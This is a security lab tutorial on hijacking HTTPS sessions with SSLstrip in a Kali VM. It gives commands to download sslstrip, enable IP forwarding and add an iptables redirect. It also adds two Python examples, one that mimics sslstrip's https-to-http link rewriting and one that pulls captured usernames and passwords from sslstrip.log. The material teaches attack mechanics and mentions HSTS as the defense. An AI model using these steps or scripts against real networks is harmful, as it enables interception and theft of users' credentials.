Hijacking HTTPS Sessions with SSLstrip (NETLAB)

Use your Kali64 Machine

Open the Kali64 virtual machine. Log in as root with the password toor

Goal

The Attacker machine will act as a proxy between the victim's browser and the web server: it fetches pages from the server over HTTPS, rewrites every https:// link in them to http://, and relays the result over plain HTTP, so the victim's forms are submitted in the clear. Nothing in the page itself warns the user; the only visible sign is the missing "https" in the address bar.

Using a Secure Login Page

Open IceWeasel and go to attack.samsclass.info

Scroll down to the "Website Attacks and Defense" section, as shown below.

Click the "Secure Login" button.

A page opens, asking you to enter your name, as shown below.

Notice that the URL starts with https -- the connection to the server is encrypted with TLS, so your name is protected on the wire.

Type in your name and click the Enter button. A "Vulnerable Message Board" opens.

Downloading SSLstrip

In a Terminal window, execute these commands:
cd

wget http://samsclass.info/sslstrip-0.9.tar.gz

tar xzf sslstrip-0.9.tar.gz

cd sslstrip-0.9

more README

Read through the instructions--they are a quick summary of what we are doing here. When you are done, press q to quit "more". (Ctrl+Z would only suspend it in the background, not close it.)

Starting IP Forwarding

In a Terminal window, execute these commands:
cp /etc/sysctl.conf /etc/sysctl.conf.bak

nano /etc/sysctl.conf

This opens the sysctl.conf file in the nano editor.

Scroll down and find the line that says "#Uncomment the next line to enable packet forwarding for IPv4". Remove the # at the start of the next line, as shown below on this page:

Press Ctrl+X, Y, Enter to save the file. Note that sysctl.conf is only read at boot, so saving it does not change the running kernel by itself; run sysctl -p to apply it now, and confirm that /proc/sys/net/ipv4/ip_forward contains 1 before going on.

Setting iptables to redirect HTTP requests

In a Terminal window, execute these commands:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

iptables -t nat -L

You should see one rule in the PREROUTING chain, as shown below on this page:

Check it carefully. If you find any mistake, use this command to delete the rule: iptables -t nat -D PREROUTING 1 and then repeat the commands above to re-create it without the error. This rule redirects port 80 traffic that arrives on a network interface (from other hosts) to sslstrip on port 8080; it is what makes the attack transparent when the victim's traffic is forwarded through the attacker.

Starting sslstrip

On the Attacker Linux machine, in a Terminal window, type this command, and then press Enter:
python sslstrip.py -h
A help message appears, showing the options. There aren't many of them.

On the Attacker Linux machine, in a Terminal window, type this command. Then press the Enter key.

python sslstrip.py -l 8080
This starts sslstrip listening on port 8080. Everything it captures is written to a file named sslstrip.log in the current directory. Leave this Terminal window open.

Starting the Logfile Scanner

On your Attacker machine, open a new Terminal window. Execute these commands:
cd

cd sslstrip-0.9

tail -f sslstrip.log

This command follows the log file and shows the form data and other information captured by sslstrip as it arrives. For now it shows an empty window, because no traffic has passed through the proxy yet, as shown below:

Leave this Terminal window open.

Setting the Target Machine to Use a Proxy Server

In a real attack, we would redirect traffic by ARP poisoning, so that the victim's port 80 packets pass through the attacker and hit the iptables rule above. But for this project, we'll just set the proxy within IceWeasel. That makes the project easier to do, because it won't affect other machines in the lab. Because the browser then sends its requests straight to port 8080 on localhost, the iptables rule is not exercised in this setup.

On the Target machine, in IceWeasel, at the top right, click the icon with three horizontal lines.

Click Preferences.

On the Network tab, click the Settings button.

Select "Manual proxy configuration" and set the HTTP Proxy to 127.0.0.1, port 8080, as shown below.

Click OK. Click Close.

Using a Secure Login Page

In IceWeasel, return to http://attack.samsclass.info

Scroll down to the "Website Attacks and Defense" section, as shown below.

Click the "Secure Login" button.

A page opens, asking you to enter your name, as shown below.

Notice that the URL now starts with http, not https. This is what sslstrip does--it fetched the page from the server over HTTPS, rewrote the https:// link to http://, and relayed it to the browser over plain HTTP. The browser shows no certificate warning because it never attempted a TLS connection; the page is simply no longer secure.

Type in your name and click the Enter button. A "Vulnerable Message Board" opens.
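The rewriting that produced the http URL above, reduced to its core, as an added example for this page (not sslstrip's own code). It assumes a simplified model of what sslstrip does: every absolute https:// URL in a response body or Location header is rewritten to http:// and remembered as a "secure link", and when the victim later requests one of those remembered (host, path) pairs over plain HTTP the proxy fetches it from the real server over HTTPS. SAMPLE_HTML is a constructed stand-in for the Secure Login page, not the real page source.

```python
"""Miniature of what sslstrip does between victim and server. Added example
for this page, not sslstrip's own code; SAMPLE_HTML is constructed."""
import re
from urllib.parse import urlsplit

# Constructed stand-in for the "Secure Login" page (not the real page source).
SAMPLE_HTML = (
    b'<a href="https://attack.samsclass.info/securelogin/">Secure Login</a>\n'
    b'<form action="https://attack.samsclass.info/securelogin/post.php" method="post">\n'
    b'<input name="name"><input type="submit" value="Enter"></form>\n'
    b'<a href="http://attack.samsclass.info/">Home</a>\n'
)

# Any absolute https:// URL in a response body or Location header.
HTTPS_URL = re.compile(rb"https://[\w.\-:]+(?:/[^\s\"'<>]*)?")


def split_url(url):
    """(host, path) key for the secure-link table; path always starts with '/'."""
    parts = urlsplit(url)
    path = parts.path or "/"
    if parts.query:
        path += "?" + parts.query
    return parts.netloc.lower(), path


class StripProxy:
    """State for one victim (sslstrip keys its URL monitor by client address)."""

    def __init__(self):
        # Links handed to the victim as http:// that the proxy must still
        # fetch over https from the real server.
        self.secure = set()

    def _strip(self, m):
        url = m.group(0).decode("ascii", "replace")
        self.secure.add(split_url(url))
        return b"http://" + m.group(0)[len(b"https://"):]

    def rewrite_response(self, headers, body):
        """Rewrite one server response (headers dict, body bytes) before it is
        relayed to the victim. Returns the rewritten (headers, body)."""
        out = dict(headers)
        if "Location" in out:
            # A redirect to https is downgraded too, and its target tracked.
            out["Location"] = HTTPS_URL.sub(
                self._strip, out["Location"].encode("ascii", "replace")
            ).decode("ascii")
        new_body = HTTPS_URL.sub(self._strip, body)
        out["Content-Length"] = str(len(new_body))  # body shrank by one byte per URL
        return out, new_body

    def upstream_scheme(self, host, path):
        """Scheme the proxy uses toward the real server for a victim request
        that arrived as plain http."""
        return "https" if (host.lower(), path) in self.secure else "http"


def demo():
    """Walk the lab: relay the login page, then see how later requests are treated."""
    proxy = StripProxy()
    hdrs, body = proxy.rewrite_response({"Content-Type": "text/html"}, SAMPLE_HTML)
    # A 302 from the server pointing at https gets downgraded the same way.
    rhdrs, _ = proxy.rewrite_response(
        {"Location": "https://attack.samsclass.info/securelogin/done"}, b"")
    return {
        "body": body,
        "content_length": hdrs["Content-Length"],
        "location": rhdrs["Location"],
        # The victim now POSTs the form over plain http; the proxy goes to https.
        "post_scheme": proxy.upstream_scheme("attack.samsclass.info", "/securelogin/post.php"),
        # The Home link was http to begin with and stays http upstream.
        "home_scheme": proxy.upstream_scheme("attack.samsclass.info", "/"),
        "secure": sorted(proxy.secure),
    }


if __name__ == "__main__":
    result = demo()
    print(result["body"].decode())
    print("form POST goes upstream over:", result["post_scheme"])
```

The victim's browser never sees a certificate or a TLS handshake, which is why there is no warning. The standard defense is HTTP Strict Transport Security: a browser that has an HSTS entry (or preload) for the site refuses to connect over plain HTTP at all, so there is nothing for the proxy to downgrade.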

Viewing the Stolen Password

In the logfile scanner window, your name should appear, as shown below. Sslstrip captured it from the plain-HTTP form submission.
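Reading the captured names and passwords back out of sslstrip.log, as an added example for this page (not part of sslstrip). The log excerpt is constructed, and the line format it assumes (a timestamped "SECURE POST Data (host):" header line followed by the URL-encoded form body, with "SECURE" marking a submission sslstrip relayed over https) is an assumption about sslstrip's output; adjust the HEADER pattern if your log looks different.

```python
"""Pull captured form submissions out of an sslstrip-style log. Added example
for this page (not part of sslstrip); the excerpt is constructed and its line
format is an assumption about sslstrip's output."""
import re
from urllib.parse import parse_qsl

# Constructed excerpt. Assumed format: a POST sslstrip had to relay over https
# is tagged "SECURE POST"; a POST that was plain http all along has no tag.
SAMPLE_LOG = """\
2016-05-10 14:02:11,512 SECURE POST Data (attack.samsclass.info):
name=Sam+Bowne&submit=Enter

2016-05-10 14:03:05,004 POST Data (www.example.com):
q=hello+world

2016-05-10 14:04:40,771 SECURE POST Data (mail.example.org):
username=alice&password=s3cret%21&remember=1
"""

HEADER = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d,\d{3}) "
    r"(?P<secure>SECURE )?(?P<method>POST) Data \((?P<host>[^)]+)\):$"
)
# Field names that usually carry credentials (heuristic, case-insensitive).
CRED_HINTS = ("pass", "pwd", "user", "login", "email", "name")


def parse_log(text):
    """Return one record per logged POST: time, host, whether it was a
    stripped https submission, and the decoded form fields."""
    records = []
    lines = text.splitlines()
    i = 0
    while i < len(lines):
        m = HEADER.match(lines[i])
        if not m:
            i += 1
            continue
        # The body is the non-empty lines that follow, up to the next blank line.
        # A real POST body is one line; joining with '&' tolerates wrapped ones.
        body = []
        i += 1
        while i < len(lines) and lines[i].strip():
            body.append(lines[i])
            i += 1
        fields = dict(parse_qsl("&".join(body), keep_blank_values=True))
        records.append({
            "time": m["ts"],
            "host": m["host"],
            "secure": m["secure"] is not None,
            "fields": fields,
        })
    return records


def find_credentials(records):
    """(host, field, value) for fields that look like logins or passwords,
    taken from stripped (originally https) submissions only."""
    hits = []
    for r in records:
        if not r["secure"]:
            continue
        for k, v in r["fields"].items():
            if any(h in k.lower() for h in CRED_HINTS):
                hits.append((r["host"], k, v))
    return hits


if __name__ == "__main__":
    # On the Attacker machine: parse_log(open("sslstrip.log").read())
    for host, field, value in find_credentials(parse_log(SAMPLE_LOG)):
        print(f"{host}: {field}={value}")
```

Only the "SECURE" records are of interest here: those are the submissions the victim believed were going over HTTPS. The plain-http POST to www.example.com would have been readable on the wire with or without sslstrip.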

Credits

I am grateful to Moxie Marlinspike for writing sslstrip and presenting it at Black Hat.

Last revised 5-10-16 by Sam Bowne
Revised 6-16-16 for NETLAB